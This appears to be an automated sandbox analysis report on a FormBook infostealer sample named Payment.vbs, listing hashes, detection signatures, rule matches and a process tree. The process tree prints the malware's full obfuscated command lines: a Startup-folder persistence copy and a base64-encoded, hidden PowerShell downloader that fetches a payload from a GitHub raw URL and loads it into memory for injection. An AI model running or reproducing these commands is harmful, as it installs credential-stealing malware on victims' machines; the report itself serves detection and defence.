Edit tour
Windows
Analysis Report
Payment.vbs
Overview
General Information
| Sample name: | Payment.vbs |
| Analysis ID: | 1528048 |
| MD5: | de0d7fea05e69a8cf4b7c6071735b141 |
| SHA1: | cc1218cab6f6bccd985a32b443f47ffa2c7bb8b5 |
| SHA256: | 1ace0faeac611f4f52e524e7f6ebf4bfd7ca7d1c697427d0828b3368854d9c7c |
| Tags: | vbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
FormBook
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Queues an APC in another process (thread injection)
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 6408 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Payme nt.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 4176 cmdline: "C:\Window s\System32 \cmd.exe" /c ping 12 7.0.0.1 -n 10 & powe rshell -co mmand [Sys tem.IO.Fil e]::Copy(' C:\Windows \system32\ Payment.vb s', 'C:\Us ers\' + [E nvironment ]::UserNam e + ''\App Data\Roami ng\Microso ft\Windows \Start Men u\Programs \Startup\ sbv.emarie hnip.vbs') ') MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3320 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
PING.EXE (PID: 1340 cmdline: ping 127.0 .0.1 -n 10 MD5: 2F46799D79D22AC72C241EC0322B011D) 
powershell.exe (PID: 1584 cmdline: powershell -command [System.IO .File]::Co py('C:\Win dows\syste m32\Paymen t.vbs', 'C :\Users\' + [Environ ment]::Use rName + '' \AppData\R oaming\Mic rosoft\Win dows\Start Menu\Prog rams\Start up\ sbv.em ariehnip.v bs')') MD5: 04029E121A0CFA5991749937DD22A1D9) - powershell.exe (PID: 2436 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' SWV4ICgoKC doJysnUmZ1 JysncmwgPS BoM2todHRw czonKycvLy crJ3JhJysn dy4nKydnaX RodScrJ2J1 Jysnc2VyJy snY29udGVu JysndC5jb2 0nKycvTm8n KydEZXRlY3 RPJysnbi9O b0RldGVjdE 9uL3JlZnMv aGVhZHMvbW Fpbi9EZScr J3RhaE5vdG gtJysnVi50 eHRoM2s7IG hSJysnZmIn Kydhc2U2NC crJ0NvbnRl bnQgPScrJy AoTmUnKyd3 LU9iamVjdC BTeXN0ZScr J20uTicrJ2 V0LldlYicr J0NsaWVudC kuRG93bmxv YWRTdHInKy dpbmcnKyco aFInKydmdX JsKTsgaFIn KydmYmluYX InKyd5Qycr J29udGVudC A9IFtTJysn eScrJ3N0ZW 0uQ29udmVy JysndF06Jy snOkZyb21C YScrJ3MnKy dlNjRTdHIn KydpbmcoaC crJ1JmYicr J2EnKydzJy snZTY0Q28n KydudGVudC crJyknKyc7 IGgnKydSZm EnKydzcycr J2VtYmx5ID 0gW1JlZmxl JysnY3Rpb2 4nKycuQXNz ZW1ibHknKy ddOjpMb2Fk KGhSZmJpbm FyeUNvbnRl bnQpOyBbZC crJ25saWIn KycuSU8uSG 9tZV06OlZB SSgnKydDdX QwL08nKycx RktTL2QvZW UuZXRzYXAn KycvLzpzcH R0aCcrJ0N1 dCwgQ3UnKy d0ZCcrJ2Vz YXRpdmFkb0 N1dCwnKycg JysnQ3UnKy d0ZGVzYXRp dmFkb0N1dC wgJysnQ3V0 ZGUnKydzYX RpdmFkb0N1 dCwgQ3V0ZC crJ2VzJysn YXQnKydpdm EnKydkbycr J0N1dCwnKy cgQycrJ3V0 MUMnKyd1dC wgQ3V0YXBw aWR0ZWxDdX QpJykgIC1j UkVwbEFjRS dDdXQnLFtj SEFSXTM0IC AtUkVwTEFD ZSAgKFtjSE FSXTEwNCtb Y0hBUl04Mi tbY0hBUl0x MDIpLFtjSE FSXTM2ICAt UkVwTEFDZS hbY0hBUl0x MDQrW2NIQV JdNTErW2NI QVJdMTA3KS xbY0hBUl0z OSkp';$OWj uxd = [sys tem.Text.e ncoding]:: UTF8.GetSt ring([syst em.Convert ]::Frombas e64String( $codigo)); powershell .exe -wind owstyle hi dden -exec utionpolic y bypass - NoProfile -command $ OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 4436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3768 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and "Iex ( (('h'+'Rfu '+'rl = h3 khttps:'+' //'+'ra'+' w.'+'githu '+'bu'+'se r'+'conten '+'t.com'+ '/No'+'Det ectO'+'n/N oDetectOn/ refs/heads /main/De'+ 'tahNoth-' +'V.txth3k ; hR'+'fb' +'ase64'+' Content =' +' (Ne'+'w -Object Sy ste'+'m.N' +'et.Web'+ 'Client).D ownloadStr '+'ing'+'( hR'+'furl) ; hR'+'fbi nar'+'yC'+ 'ontent = [S'+'y'+'s tem.Conver '+'t]:'+': FromBa'+'s '+'e64Str' +'ing(h'+' Rfb'+'a'+' s'+'e64Co' +'ntent'+' )'+'; h'+' Rfa'+'ss'+ 'embly = [ Refle'+'ct ion'+'.Ass embly'+']: :Load(hRfb inaryConte nt); [d'+' nlib'+'.IO .Home]::VA I('+'Cut0/ O'+'1FKS/d /ee.etsap' +'//:sptth '+'Cut, Cu '+'td'+'es ativadoCut ,'+' '+'Cu '+'tdesati vadoCut, ' +'Cutde'+' sativadoCu t, Cutd'+' es'+'at'+' iva'+'do'+ 'Cut,'+' C '+'ut1C'+' ut, Cutapp idtelCut)' ) -cREplAc E'Cut',[cH AR]34 -REp LACe ([cHA R]104+[cHA R]82+[cHAR ]102),[cHA R]36 -REpL ACe([cHAR] 104+[cHAR] 51+[cHAR]1 07),[cHAR] 39))" MD5: 04029E121A0CFA5991749937DD22A1D9) - appidtel.exe (PID: 1052 cmdline:
"C:\Window s\SysWOW64 \appidtel. exe" MD5: 2C04FB942B2735073D75063E9FFBF50C) 
mNqSPruzCXM.exe (PID: 7160 cmdline: "C:\Progra m Files (x 86)\eOzLOC LFzIjDwxUA upKFqaMuNU kECYDhsxWH gpZJjczOdu hxqpSFlANY MiqNahFLJm LTxn\mNqSP ruzCXM.exe " MD5: 32B8AD6ECA9094891E792631BAEA9717) - convert.exe (PID: 5292 cmdline:
"C:\Window s\SysWOW64 \convert.e xe" MD5: 2B1AC34AB72C95793CFE7E936F15389D) - mNqSPruzCXM.exe (PID: 3196 cmdline:
"C:\Progra m Files (x 86)\eOzLOC LFzIjDwxUA upKFqaMuNU kECYDhsxWH gpZJjczOdu hxqpSFlANY MiqNahFLJm LTxn\mNqSP ruzCXM.exe " MD5: 32B8AD6ECA9094891E792631BAEA9717) 
firefox.exe (PID: 1756 cmdline: "C:\Progra m Files\Mo zilla Fire fox\Firefo x.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
- svchost.exe (PID: 5708 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. |
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Click to see the 11 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
| |
| JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
| Windows_Trojan_Formbook_1112e116 | unknown | unknown |
|
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||